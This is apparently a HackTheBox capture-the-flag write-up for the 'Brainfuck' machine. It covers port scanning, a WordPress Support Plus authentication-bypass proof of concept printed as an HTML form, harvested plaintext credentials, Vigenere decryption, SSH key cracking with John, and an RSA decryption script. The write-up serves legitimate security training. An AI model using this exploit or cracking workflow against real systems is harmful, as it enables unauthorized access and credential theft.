HackTheBox Write-Up — Brainfuck
Brainfuck is a challenging box which involves chaining many steps, an understanding of cryptography, and unique privilege escalation.
nmap -T4 -p- 10.10.10.17
Starting Nmap 7.70 ( https://nmap.org ) at 2020–05–19 10:15 EDT
Nmap scan report for 10.10.10.17
Host is up (0.056s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
110/tcp open pop3
143/tcp open imap
443/tcp open httpsNmap done: 1 IP address (1 host up) scanned in 130.62 seconds
nmap -T4 -A -p22,25,110,143,443 10.10.10.17
Starting Nmap 7.70 ( https://nmap.org ) at 2020–05–19 10:18 EDT
Nmap scan report for 10.10.10.17
Host is up (0.055s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: USER SASL(PLAIN) TOP RESP-CODES AUTH-RESP-CODE PIPELINING CAPA UIDL
143/tcp open imap Dovecot imapd
|_imap-capabilities: LITERAL+ capabilities IMAP4rev1 OK more have post-login LOGIN-REFERRALS AUTH=PLAINA0001 ID listed ENABLE Pre-login SASL-IR IDLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017–04–13T11:19:29
|_Not valid after: 2027–04–11T11:19:29
|_ssl-date: ERROR: Script execution failed (use -d to debug)
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10–4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16–4.6 (92%), Linux 3.18 (92%), Linux 3.2–4.9 (92%), Linux 3.8–3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 55.44 ms 10.10.14.1
2 55.55 ms 10.10.10.17OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.83 seconds
While it would be good to enumerate each service version, Nmap is showing us some additional information about port 443 including DNS information and a default web page.
The machine serves a default page and does not respond properly to it’s IP address, we will need to add the DNS records to our /etc/hosts file.
cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.10.17 www.brainfuck.htb sup3rs3cr3t.brainfuck.htb# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
By running Nikto on these hosts we discover an email address from the certificate information, keep in mind that ports: 25, 110, 143 are open.
nikto -h https://brainfuck.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.17
+ Target Hostname: brainfuck.htb
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=GR/ST=Attica/L=Athens/O=Brainfuck Ltd./OU=IT/CN=brainfuck.htb/emailAddress=orestis@brainfuck.htb
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=GR/ST=Attica/L=Athens/O=Brainfuck Ltd./OU=IT/CN=brainfuck.htb/emailAddress=orestis@brainfuck.htb
+ Start Time: 2020-05-25 16:44:44 (GMT-4)
---------------------------------------------------------------------------
Because we are dealing with a WordPress site… why not run a WordPress Scan?
wpscan — url https://brainfuck.htb — disable-tls-checks
$ wpscan --url https://brainfuck.htb --disable-tls-checks
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
Within the WPScan- we find an outdated plugin which appears to have a number of vulnerabilities.
[+] Name: wp-support-plus-responsive-ticket-system — v7.1.3
| Last updated: 2018–08–15T05:44:00.000Z
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-
plus-responsive-ticket-system/
| Readme: https://brainfuck.htb/wp-content/plugins/wp-support-pl
us-responsive-ticket-system/readme.txt
[!] The version is out of date, the latest version is 9.1.0
[!] Directory listing is enabled: https://brainfuck.htb/wp-content
/plugins/wp-support-plus-responsive-ticket-system/
By searching the plugin along with it’s version on Google, we find two exploits. Based on my own experience, 41006 is the only one that works.
Download the exploit using Searchsploit and the EDB-ID.
searchsploit -m 41006
2. Proof of Concept<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
This exploit has us hosting the POC code locally and executing an SQL injection attack against our target.
Put the modified POC into a file called privesc.html and visit it within Firefox.
As you can see we’re going to need a username, let’s use WPScan again to enumerate usernames.
wpscan — url https://brainfuck.htb — disable-tls-checks — enumerate u
$ wpscan --url https://brainfuck.htb --disable-tls-checks --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________[+] Enumerating usernames ...
[+] We identified the following 2 users:
+----+---------------+---------------+
| ID | Login | Name |
+----+---------------+---------------+
| 1 | admin | admin |
| 2 | administrator | administrator |
+----+---------------+---------------+
[!] Default first WordPress username 'admin' is still used
Starting with the default “admin” account, we type the username into our SQL injection file and click “Login.”
Checking back on https://brainfuck.htb we’ve successfully managed to elevate privilege to an authenticated user.
After traversing through the https://brainfuck.htb/wp-admin/ portal, we’ve stumbled across some credentials by first clicking on the “Settings” option of the “Easy WP SMTP” plugin.
You can grab the credentials on this page with a right click to “Inspect Element” and using the drop down.
orestis@brainfuck.htb | KHGuERB29DNiNE
We take these credentials and use Thunderbird to enumerate the mailbox.
apt-get install thunderbird
After we login to the email account with Thunderbird, we come across another set of credentials inside the inbox giving access to the forum.
orestis | kIEnnfEKJ#9UmdO
Once logged in to the forum we come across an encrypted conversation between Orestis and the Administrator. Based on the conversation had in plain-text, Orestis very rudely is requesting an SSH key.
Looking closely at the plain-text conversation and the encrypted conversation, there appears to be one similarity between the two. This is Orestis’s signature: “Orestis — Hacking for fun and profit.”
We are going to try what is called a KPA “Known plain-text attack,” to uncover the SSH key in cipher-text. To do this, we’re going to need to identify the type of cipher first.
The link above will bring you to a website where we can drop the first bit of cipher-text we have highlighted, and determine the type of cipher.
Pieagnm - Jkoijeg nbw zwx mle grwsnn
A couple clicks of curiosity brings us to this website’s “Vigenere Cipher Tool.” Note: When scrolling down on this page, it will give you a great explanation of the Cipher’s origin, and how to decrypt manually. I highly recommend giving their exercise a shot to best understand the basics of cryptography.
Throwing the cipher-text in to decrypt, and playing around with the known plain-text, I started to see some English come about after removing some spaces and dashes.
Brainfu - Ckmybra inf uck myb rainfu
By reusing this method of removing spaces/special characters, and through trial and error — I’ve discovered the key is fuckmybrain as shown below.
fuckmybrain
Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :)mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptrThere you go you stupid fuck, I hope you remember your key password because I dont :)https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa
We have a link to the id_rsa, and after downloading we quickly find this file is encrypted with a password.
We’re able to crack this password with John the Ripper, but first we need to convert to a format that is crack-able by John. We will use a common script called ssh2john.py
wget https://raw.githubusercontent.com/koboi137/john/bionic/ssh2john.py
We’re going to run this script against the id_rsa, then append the output to a file called john.txt
python ssh2john.py id_rsa > john.txt
id_rsa:$sshng$1$16$6904FEF19397786F75BE2D7762AE7382$1200$9a779a83f60263c001f8e2ddae0b722aa9eb7531f09a95864cd5bda5f847b0dcfc09f19d03181c8546877a84e3feb87f0769d2e3ef426012bc211dd5b79168ecfa160428c0030598971f9c2b4c350d7a9adc0f812e5b122342b0b3d8de6ba1a25b599afd5ed6a0927e57824d23bb9f4e143238450eefa3e560d44cf54105f0c00d42624adfb31df44ceee77c09a54a99edd29c83a00cfe8f5584e969897ed220d4fd75129a29ebce8e8a516f210532588fd351fb6656a158f7514667c25d2990cf11fd2369462104ed451037ac592d2e935e74d3ee650092b3051e73b79556dda673666ff4f33d9424c9b914b3cd5ba6a33dd712785a1a63f58e63285415a20fed91ae72fac27cfd92cb15fad802574983f7b592fb5c9d5843de0a9874e8c7a674b4762f5baf04625ebfc8bd84fded869d68c2f33c1e089dc9f302daf381bd76dc000ddb0cabd1e23b33da86dfe4017e16fb7aa6632e8b1f216e2a4fd75d94b39e324effe1c82f8ce60d61594ba3e72e31a2f82bd0b2df236a467be16fe655d399cce773566a0d8e65ae5996cd3bec5bb87bae6f4b2a01221e7f601a0aa23a544a9f915497e0e57da00c1d689850a62c2d2315bc323ac3cf2065bd74d8a0f6938355d0fe8e7572022403046b59923a4fcb4bf98b3b87b4377c045fe36d8156eaba5f60b929686dab085f90e401c63e111de3fbf61e7e9c849d8b3efed7d34f5a0cf814774d54a525c3abbcd9ab232e7d92b295b6e97101e8d5433c489963940d80bde3b4d7bbd040b21d0c2e82ada4844bdc771bbbebe2f4be679f92e484efd581d3323b2013a2bec09aedb16fddce3b9e572a4075962c36ae55a0eac0695ccd56520a0c416e7429ea3a3b48f37867c057098cef65db6ae82684a5b6e6aff8ebfc8be1530ab83c872f91dcf8ebf9bf76d0f74f29f94adfd38769be3f528c1ce7b1c86aa33a20702d547c97029ba725fbdebb18505adeb0f9603a77c76c72215f5241dc06bc7d1921ca7474a2a431566d517f214eabf544e4780a4f06d7333a59ce10a87e8352a1a2dedafb9d8c32ef0c75249e96461a7259d2feb2ef1ff7a2a717b83064bb553fceddf11dee0044599f114ef4cb8e654dbe3c49c35dd48248cbf7a97f45bcf618dce3ca6ecc62032f8cc197b32cd8a9f345e671527019462c767fa207f50f31d757d76277d1851bb70fd1df84d08911548562d316b98e68b69b22a9792fed0911b799f4ee7a0da5c5a8fde05e1331f3104a5106b1d9ec684eb7a8c42239edac41401a9384483f1d30b22103e61d6dfa9b1b5cf8894c0c4c5d2c7583ee69cdb88752862011e9b5d861233713bdb97f32c4d4c16ee395641c38859b1cbd11543ebf8f64838c85c1434f3dbb0ea6929cee0256a52d58fe2fab0ca83c64d5774c86f94c0a88a9046066aa4f0af7cf46998b511427be5cbcf575fdec918945218985b002a943199dfc05a7167c68fb15c2ca17472bae6f8ddaec6b45f438b209b846b85db361c98a8d1e4438e4fb1ec82a40870038c216e79ab6149a6a1f5f8f53c7887c5ce4854634aa819210116466e08fcae8d8393caf4197b0c9df9ac7bdc7388ed91e8cbc0b10e48d26c85f200bc806bb229dda81db4e3e79a2ea10fe8f1bdba71160f2281db59961f4fb1f22090d64af11aa73f29803c2caf466f1ceef6451f84b04200f91574f0190
You might also have ssh2john already installed on your Kali machine. To avoid confusion- I will append the output to brainfuck.txt, because the output is different.
ssh2john id_rsa > brainfuck.txt
id_rsa:$ssh2$2d2d2d2d2d424547494e205253412050524956415445204b45592d2d2d2d2d0a50726f632d547970653a20342c454e435259505445440a44454b2d496e666f3a204145532d3132382d4342432c36393034464546313933393737383646373542453244373736324145373338320a0a6d6e6561672f5943593841422b4f4c64726774794b716e72645448776d705747544e573970666848734e7a38436647644178676368556148656f546a2f72682f0a42326e53342b394359424b38495233567435466f37506f5742436a41417757596c782b634b3077314458716133412b424c6c735349304b7773396a65613647690a57316d612f5637576f4a4a2b56344a4e49377566546851794f45554f3736506c594e524d39554546384d414e516d4a4b33374d6439457a753533774a7055715a0a37644b636736414d2f6f3956684f6c7069583753494e543964524b614b65764f6a6f7052627945464d6c6950303148375a6c616857506452526d664358536d510a7a78483949326c47495154745252413372466b744c704e65644e50755a51435373775565633765565674326d63325a7639504d396c43544a7552537a7a56756d0a6f7a3358456e6861476d50316a6d4d6f56425769442b3252726e4c36776e7a396b7373562b74674356306d44393757532b3179645745506543706830364d656d0a644c52324c31757642474a6576386939685033746870316f77764d384867696479664d4332764f427658626341413362444b7652346a737a326f62663541462b0a46767436706d4d756978386862697050313132557335347954762f6879432b4d356731685755756a357934786f766772304c4c6649327047652b4676356c58540a6d637a6e63315a714459356c726c6d577a54767357376837726d394c4b674569486e3967476771694f6c524b6e3546556c2b446c6661414d48576959554b59730a4c534d5676444936773838675a623130324b44326b344e563050364f645849434a414d4561316d534f6b2f4c532f6d4c4f3465304e337745582b4e74675662710a756c396775536c6f626173495835446b4163592b4552336a2b2f5965667079456e59732b2f74665454316f4d2b4252335456536c4a634f72764e6d72497935390a6b724b5674756c7841656a56517a78496d574f554459433934375458753942417368304d4c6f4b747049524c33486362752b7669394c356e6e354c6b684f2f560a67644d794f7941546f7237416d7532786239334f4f3535584b6b42316c697732726c576736734270584d315755676f4d515735304b656f364f306a7a654766410a56776d4d373258626175676d684b573235712f34362f794c34564d4b754479484c3548632b4f763576336251393038702b55726630346470766a39536a427a6e0a736368716f7a6f6763433155664a63436d36636c2b3936374746426133724435594470337832787949563953516477477648305a49637030644b4b6b4d565a740a5558386854717631524f5234436b3847317a4d36576334517148364455714769337472376e597779377778314a4a36575268707957644c2b7375386639364b6e0a463767775a4c745650383764385233754145525a6e78464f394d754f5a55322b50456e4458645343534d76337158394676505959334f504b6273786941792b4d0a775a657a4c4e69703830586d63564a7747555973646e2b69422f55504d64645831324a333059556274772f52333454516952465568574c5446726d4f614c61620a49716c354c2b304a4562655a394f3536446158467150336758684d783878424b555161783265786f5472656f7843493537617842514271546845672f485443790a4951506d485733366d7874632b496c4d444578644c485744376d6e4e75496453686941523662585959534d3345373235667a4c45314d46753435566b484469460a6d7879394556512b7634396b6734794677554e505062734f70704b6337674a57705331592f692b72444b67385a4e56335449623554417149715152675a7170500a4376665052706d4c5552516e766c793839585839374a474a5253474a6862414371554d5a6e66774670785a386150735677736f585279757562343361374774460a39446979436268477546327a59636d4b6a5235454f4f543748736771514963414f4d495735357132464a707148312b505538654966467a6b68555930716f47530a4542466b5a75435079756a594f547976515a657779642b61783733484f49375a486f79384378446b6a5362495879414c79416137497033616764744f506e6d690a3668442b6a7876627078466738696764745a6c683950736649676b4e5a4b3852716e50796d4150437976526d386337765a4648345377516744354658547747510a2d2d2d2d2d454e44205253412050524956415445204b45592d2d2d2d2d0a*1766*0
Whichever way you decided to go with, you should have an output file. We are going to crack this output file with John, and the rockyou.txt word list.
john john.txt — wordlist=/usr/share/wordlists/rockyou.txt
john brainfuck.txt — wordlist=/usr/share/wordlists/rockyou.txt
orestis | 3poulakia!
Now that we have the password, we’re able to successfully gain a foothold into the machine via ssh with Orestis’s id_rsa key and credentials shown above.
ssh -i id_rsa orestis@brainfuck.htb
Within Orestis’s home directory we notice a file called encrypt.sage
For as far as I can attest, we are dealing with RSA encryption when we research the variables P, Q, and E. The contents of the encrypt.sage file suggests our objective file /root/root.txt is being used as input. The encrypted password is written to the output.txt file and P, Q, and E are stored in the debug.txt file. The variables are defined as:
p = 1st prime numberq = 2nd prime numbere = public/encryption exponentct = cipher-text
We owe credit to where it’s due as someone who is a lot smarter than myself has created a Python script to decrypt, essentially to do this we need P, Q, and E to recover and use the private key with the Extended Euclidean Algorithm.
n=p*q phi=(p-1)(q-1) gcd, a, b = egcd(e, phi) d = decryption algorithm
We can calculate this since we have read access to obtain the following information:
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
#!/usr/bin/python
## RSA - Given p,q and e.. recover and use private key w/ Extended Euclidean Algorithm - crypto150-what_is_this_encryption @ alexctf 2017
# @author intrd - http://dann.com.br/ (original script here: http://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/import binascii, base64p =
q =
e =
ct =def egcd(a, b):
x,y, u,v = 0,1, 1,0
while a != 0:
q, r = b//a, b%a
m, n = x-u*q, y-v*q
b,a, x,y, u,v = a,r, u,v, m,n
gcd = b
return gcd, x, yn = p*q #product of primes
phi = (p-1)*(q-1) #modular multiplicative inverse
gcd, a, b = egcd(e, phi) #calling extended euclidean algorithm
d = a #a is decryption keyout = hex(d)
print("d_hex: " + str(out));
print("n_dec: " + str(d));pt = pow(ct, d, n)
print("pt_dec: " + str(pt))out = hex(pt)
out = str(out[2:-1])
print "flag"
print out.decode("hex")
Ensure you modify the script and input the proper parameters before running.
python rsa_egcd.py